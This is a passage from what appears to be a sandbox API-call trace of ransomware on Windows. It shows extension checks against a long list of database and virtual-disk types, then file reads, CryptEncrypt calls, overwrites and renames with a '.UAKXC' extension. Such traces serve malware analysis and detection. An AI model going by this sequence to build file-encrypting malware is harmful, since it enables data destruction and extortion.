(lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".rbf") returned 0x0 [0141.130] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".rctd") returned 0x0 [0141.130] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".rod") returned 0x0 [0141.130] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".rodx") returned 0x0 [0141.130] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".rpd") returned 0x0 [0141.130] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".rsd") returned 0x0 [0141.130] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".sas7bdat") returned 0x0 [0141.130] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".sbf") returned 0x0 [0141.130] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".scx") returned 0x0 [0141.131] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".sdb") returned 0x0 [0141.131] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".sdc") returned 0x0 [0141.131] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".sdf") returned 0x0 [0141.131] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".sis") returned 0x0 [0141.131] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".spq") returned 0x0 [0141.131] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".sql") returned 0x0 [0141.131] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".sqlite") returned 0x0 [0141.131] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".sqlite3") returned 0x0 [0141.131] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".sqlitedb") returned 0x0 [0141.131] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".te") returned 0x0 [0141.131] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".temx") returned 0x0 [0141.131] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".tmd") returned 0x0 [0141.131] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".tps") returned 0x0 [0141.131] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".trc") returned 0x0 [0141.131] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".trm") returned 0x0 [0141.131] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".udb") returned 0x0 [0141.131] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".udl") returned 0x0 [0141.131] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".usr") returned 0x0 [0141.131] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".v12") returned 0x0 [0141.131] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".vis") returned 0x0 [0141.132] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".vpd") returned 0x0 [0141.132] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".vvv") returned 0x0 [0141.132] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".wdb") returned 0x0 [0141.132] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".wmdb") returned 0x0 [0141.132] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".wrk") returned 0x0 [0141.132] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".xdb") returned 0x0 [0141.132] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".xld") returned 0x0 [0141.132] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".xmlff") returned 0x0 [0141.132] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".abcddb") returned 0x0 [0141.132] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".abs") returned 0x0 [0141.132] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".abx") returned 0x0 [0141.132] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".accdw") returned 0x0 [0141.132] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".adn") returned 0x0 [0141.132] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".db2") returned 0x0 [0141.132] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".fm5") returned 0x0 [0141.132] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".hjt") returned 0x0 [0141.132] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".icg") returned 0x0 [0141.132] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".icr") returned 0x0 [0141.132] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0141.132] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".lut") returned 0x0 [0141.133] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".maw") returned 0x0 [0141.133] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".mdn") returned 0x0 [0141.133] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".mdt") returned 0x0 [0141.133] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".vdi") returned 0x0 [0141.133] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".vhd") returned 0x0 [0141.133] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".vmdk") returned 0x0 [0141.133] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".pvm") returned 0x0 [0141.133] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".vmem") returned 0x0 [0141.133] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".vmsn") returned 0x0 [0141.133] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".vmsd") returned 0x0 [0141.133] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".nvram") returned 0x0 [0141.133] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".vmx") returned 0x0 [0141.133] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".raw") returned 0x0 [0141.133] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".qcow2") returned 0x0 [0141.133] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".subvol") returned 0x0 [0141.133] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".bin") returned 0x0 [0141.134] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".vsv") returned 0x0 [0141.134] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".avhd") returned 0x0 [0141.134] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".vmrs") returned 0x0 [0141.134] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".vhdx") returned 0x0 [0141.134] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".avdx") returned 0x0 [0141.134] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".vmcx") returned 0x0 [0141.134] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpSrch=".iso") returned 0x0 [0141.134] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.134] WriteFile (in: hFile=0x6c4, lpBuffer=0x3abfd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x3abfc78, lpOverlapped=0x0 | out: lpBuffer=0x3abfd70*, lpNumberOfBytesWritten=0x3abfc78*=0x20c, lpOverlapped=0x0) returned 1 [0141.145] WriteFile (in: hFile=0x6c4, lpBuffer=0x3abfc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x3abfc7c, lpOverlapped=0x0 | out: lpBuffer=0x3abfc80*, lpNumberOfBytesWritten=0x3abfc7c*=0xa, lpOverlapped=0x0) returned 1 [0141.145] SetEndOfFile (hFile=0x6c4) returned 1 [0141.160] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.160] ReadFile (in: hFile=0x6c4, lpBuffer=0x5030000, nNumberOfBytesToRead=0x158, lpNumberOfBytesRead=0x3abfc88, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc88*=0x158, lpOverlapped=0x0) returned 1 [0141.161] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0xfffffea8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.161] WriteFile (in: hFile=0x6c4, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x3abfc44, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc44*=0x158, lpOverlapped=0x0) returned 1 [0141.161] CloseHandle (hObject=0x6c4) returned 1 [0141.167] GetProcessHeap () returned 0xea0000 [0141.167] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xefe4b8 [0141.167] lstrcpyW (in: lpString1=0xefe4b8, lpString2="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn") returned="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" [0141.167] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.UAKXC" [0141.167] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.14.1033.hxn"), lpNewFileName="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.UAKXC" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.14.1033.hxn.uakxc")) returned 1 [0141.168] GetProcessHeap () returned 0xea0000 [0141.168] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xefe4b8 | out: hHeap=0xea0000) returned 1 [0141.168] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeef68 | out: hHeap=0xea0000) returned 1 [0141.168] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2650 | out: hHeap=0xea0000) returned 1 [0141.168] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0141.168] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0141.168] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0141.169] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.setlang.14.1033.hxn")) returned 0x2022 [0141.169] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.setlang.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0141.169] GetLastError () returned 0x0 [0141.169] GetFileSizeEx (in: hFile=0x6c4, lpFileSize=0x3abfc88 | out: lpFileSize=0x3abfc88*=338) returned 1 [0141.169] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".4dd") returned 0x0 [0141.169] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".4dl") returned 0x0 [0141.169] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".accdb") returned 0x0 [0141.169] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".accdc") returned 0x0 [0141.170] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".accde") returned 0x0 [0141.170] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".accdr") returned 0x0 [0141.170] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".accdt") returned 0x0 [0141.170] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".accft") returned 0x0 [0141.170] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".adb") returned 0x0 [0141.170] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".ade") returned 0x0 [0141.170] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".adf") returned 0x0 [0141.170] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".adp") returned 0x0 [0141.170] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".arc") returned 0x0 [0141.170] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".ora") returned 0x0 [0141.170] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".alf") returned 0x0 [0141.170] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".ask") returned 0x0 [0141.170] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".btr") returned 0x0 [0141.170] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".bdf") returned 0x0 [0141.170] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".cat") returned 0x0 [0141.170] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".cdb") returned 0x0 [0141.170] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".ckp") returned 0x0 [0141.170] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".cma") returned 0x0 [0141.170] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".cpd") returned 0x0 [0141.170] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".dacpac") returned 0x0 [0141.170] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".dad") returned 0x0 [0141.170] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".dadiagrams") returned 0x0 [0141.170] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".daschema") returned 0x0 [0141.170] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".db") returned 0x0 [0141.170] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".db-shm") returned 0x0 [0141.171] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".db-wal") returned 0x0 [0141.171] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".db3") returned 0x0 [0141.171] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".dbc") returned 0x0 [0141.171] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".dbf") returned 0x0 [0141.171] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".dbs") returned 0x0 [0141.171] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".dbt") returned 0x0 [0141.171] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".dbv") returned 0x0 [0141.171] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".dbx") returned 0x0 [0141.171] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".dcb") returned 0x0 [0141.171] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".dct") returned 0x0 [0141.171] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".dcx") returned 0x0 [0141.171] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".ddl") returned 0x0 [0141.171] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".dlis") returned 0x0 [0141.171] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".dp1") returned 0x0 [0141.171] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".dqy") returned 0x0 [0141.171] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".dsk") returned 0x0 [0141.171] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".dsn") returned 0x0 [0141.171] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".dtsx") returned 0x0 [0141.171] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".dxl") returned 0x0 [0141.171] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".eco") returned 0x0 [0141.171] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".ecx") returned 0x0 [0141.171] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".edb") returned 0x0 [0141.171] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".epim") returned 0x0 [0141.171] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".exb") returned 0x0 [0141.172] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".fcd") returned 0x0 [0141.172] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".fdb") returned 0x0 [0141.172] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".fic") returned 0x0 [0141.172] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".fmp") returned 0x0 [0141.172] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".fmp12") returned 0x0 [0141.172] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".fmpsl") returned 0x0 [0141.172] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".fol") returned 0x0 [0141.172] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".fp3") returned 0x0 [0141.172] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".fp4") returned 0x0 [0141.172] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".fp5") returned 0x0 [0141.172] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".fp7") returned 0x0 [0141.172] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".fpt") returned 0x0 [0141.172] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".frm") returned 0x0 [0141.172] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".gdb") returned 0x0 [0141.172] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".grdb") returned 0x0 [0141.172] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".gwi") returned 0x0 [0141.172] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".hdb") returned 0x0 [0141.172] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".his") returned 0x0 [0141.172] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".ib") returned 0x0 [0141.173] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".idb") returned 0x0 [0141.173] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".ihx") returned 0x0 [0141.173] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".itdb") returned 0x0 [0141.173] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".itw") returned 0x0 [0141.173] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".jet") returned 0x0 [0141.173] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".jtx") returned 0x0 [0141.173] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0141.173] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".kexi") returned 0x0 [0141.173] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".kexic") returned 0x0 [0141.173] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".kexis") returned 0x0 [0141.173] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".lgc") returned 0x0 [0141.173] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".lwx") returned 0x0 [0141.173] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".maf") returned 0x0 [0141.173] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".maq") returned 0x0 [0141.173] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".mar") returned 0x0 [0141.173] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".mas") returned 0x0 [0141.173] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".mav") returned 0x0 [0141.173] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".mdb") returned 0x0 [0141.173] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".mdf") returned 0x0 [0141.173] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".mpd") returned 0x0 [0141.174] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".mrg") returned 0x0 [0141.174] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".mud") returned 0x0 [0141.174] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft 